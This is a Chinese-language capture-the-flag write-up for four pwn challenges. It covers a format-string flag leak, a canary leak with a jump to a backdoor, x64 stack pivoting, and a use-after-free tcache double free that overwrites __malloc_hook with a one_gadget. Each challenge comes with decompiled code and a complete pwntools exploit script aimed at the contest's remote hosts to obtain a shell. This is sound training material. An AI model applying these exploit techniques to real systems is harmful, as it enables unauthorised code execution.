FZNCTF2025-PWN-WP

FZNCTF-Langx-PWN-WP

fmt

格式化字符串漏洞

int __fastcall main(int argc, const char **argv, const char **envp)
{int fd; // [rsp+4h] [rbp-24Ch]char buf[48]; // [rsp+10h] [rbp-240h] BYREFchar format[520]; // [rsp+40h] [rbp-210h] BYREFunsigned __int64 v7; // [rsp+248h] [rbp-8h]v7 = __readfsqword(0x28u);init_func(argc, argv, envp);puts("Welcome to FZNCTF!");puts("lizimi is waiting for you...");puts("what do you want to say to him?");puts("please input:");fd = open("flag", 0);if ( fd == -1 ){perror("open flag failed");exit(1);}read(fd, buf, 0x30uLL);close(fd);read(0, format, 0x200uLL);printf(format);return 0;
}

程序首先会打开flag文件并读到栈上，本地调试可知偏移为7(64位格式化字符串)

exp:

from pwn import *
#p = process("./attachment")
p = remote("nc1.ctfplus.cn",11882)
context.log_level = 'debug'
#gdb.attach(p)
p.recvuntil("please input:")
p1 = b'%7$s'p.sendline(p1)p.interactive()

bird

开了金丝雀(canary)

分析关键函数

unsigned int vuln()
{int i; // [esp+4h] [ebp-74h]char buf[100]; // [esp+8h] [ebp-70h] BYREFunsigned int v3; // [esp+6Ch] [ebp-Ch]v3 = __readgsdword(0x14u);puts("What a cute canary!!!!!");puts("Maybe the canary is a string of numbers?");puts("Can you guess the number?");for ( i = 0; i <= 1; ++i ){read(0, buf, 0x200u);printf("number %s", buf);if ( !strncmp(buf, "114514", 6u) ) //ctf经典数字Right(); //没有什么用}return __readgsdword(0x14u) ^ v3;
}

printf("number %s", buf);这一步我们可以泄露canary

泄露canary直接返回到后门getshell

exp:

from pwn import*
#p = process("./canary")
p = remote("nc1.ctfplus.cn",27529)
context.log_level = 'debug'psl = lambda data :p.sendline(data)
ps = lambda data : p.send(data)
ph = lambda data : print(hex(data))
pc = lambda data : p.recvuntil(data)def bug():gdb.attach(p)pause()def exp():pc("Can you guess the number?")offest = 0x70 -0xcp0 = b'a'*offest#bug()psl(p0)#sendline多发送一个0xa-->'\n'shell = 0x8049285p.recvuntil(b'a'*offest)canary = u32(p.recv(4)) -0xa #所以这里直接减去0xa即可，因为canary最后一个字节也是00所以不用管psl(b'a'*offest + p32(canary)+b'a'*0xC+p32(shell)) #getshellp.interactive()exp()	

stack_pivotingx64

ssize_t vuln()
{char buf[48]; // [rsp+0h] [rbp-30h] BYREFputs("now let's start to play!\n");puts("please give me your name\n");read(0, buf, 0x50uLL);printf("your name is %s\n", buf);puts("give me some other message\n");return read(0, buf, 0x50uLL);
}

程序存在栈溢出，但溢出长度不够，直接打栈迁移

printf("your name is %s\n", buf);

这一步泄露rbp地址，然后提前在栈中布置我们的rop链，存在堆栈不平衡加个ret,后面直接栈迁移

exp:

from pwn import*
a=input("yes is process ,no is remote:")
if "y" in a:p = process("./stack_pivotingx64")
elif "n" in a:p =remote("nc1.ctfplus.cn",19747)
context.log_level = 'debug'
psl = lambda data :p.sendline(data)
ps = lambda data : p.send(data)
ph = lambda data : print(hex(data))
pc = lambda data : p.recvuntil(data)def bug():gdb.attach(p)pause()def exp():rdi=0x0000000000401275system = 0x40126amagic = 0x401256pc("please give me your name\n")p0 = b'a'*0x30ps(p0)pc(b'a'*0x30)rbp = u64(p.recv(6)[-6::].ljust(8,b'\x00'))-0x10rsp = rbp-0x30binsh =rsp+32ph(rbp)#bug()p1=p64(0)+p64(rdi)+p64(binsh)+p64(system)+b'/bin/sh\x00'+p64(magic+1)+p64(rsp)+p64(magic) #magic+1为retpc("give me some other message\n")ps(p1)p.interactive()
exp()	

ezuaf

保护全开

存在uaf，不存在栈溢出

int del()
{int v0; // eaxvoid *v1; // rdiputs("idx?");v0 = get_int();if ( v0 < 0 )return puts("invalid");if ( num <= v0 )return puts("invalid");v1 = (void *)heap[v0];if ( !v1 )return puts("invalid");free(v1);//指针未置零return puts("delete done");
}

int show()
{int v0; // eax__int64 v1; // rbxputs("idx?");v0 = get_int();if ( v0 < 0 )return puts("invalid");if ( num <= v0 )return puts("invalid");v1 = v0;if ( !heap[v0] )return puts("invalid");write(1, "content: ", 9uLL);write(1, (const void *)heap[v1], sizes[v1]);return write(1, "\n", 1uLL);
}

思路：先释放0x400的chunk挂进unsortedbin,通过uaf+show计算出libc基地址，打tcache_double_free，将malloc_hook填为one_gadget,用realloc来调节栈帧getshell

exp:

from pwn import*
a=input("yes is process ,no is remote:")
if "y" in a:p = process("./pwn")
elif "n" in a:p =remote("nc1.ctfplus.cn",31004)
e = ELF("./pwn")
libc = ELF("./libc-2.27.so")context.log_level = 'debug'psl = lambda data :p.sendline(data)
ps = lambda data : p.send(data)
ph = lambda data : print(hex(data))
pc = lambda data : p.recvuntil(data)
uu64 = lambda  : u64(pc(b'\x7f')[-6::].ljust(8,b'\x00'))
def bug():gdb.attach(p)pause()def cmd(choice):pc("5. exit")psl(str(choice))def add(size,content):cmd(1)pc("size?")psl(str(size))pc("content:")psl(content)def delete(idx):cmd(2)pc("idx?")psl(str(idx))
def show(idx):cmd(3)pc("idx?")psl(str(idx))		
def edit(idx,content):cmd(4)pc("idx?")psl(str(idx))pc("content:")ps(content)def exp(i):add(0x410,b'jian')#0add(0x410,b'1angx')#1delete(0)show(0)malloc_hook = uu64()-0X70base = malloc_hook - libc.sym['__malloc_hook']realloc = base  + libc.sym['realloc']realloc_hook = malloc_hook -0x8ogg_offest = [0x4f29e,0x4f2a5,0x4f302,0x10a2fc]ogg = base +ogg_offest[0]ph(base)add(0x40,b'1angx')#2delete(2)p1= b'a'*8+p64(0x114514)edit(2,p1)delete(2)edit(2,p64(realloc_hook))add(0x40,b'1angx')#bug()add(0x40,p64(ogg)+p64(realloc+i))cmd(1)pc("size?")psl(str(0x10))p.interactive()exp(2)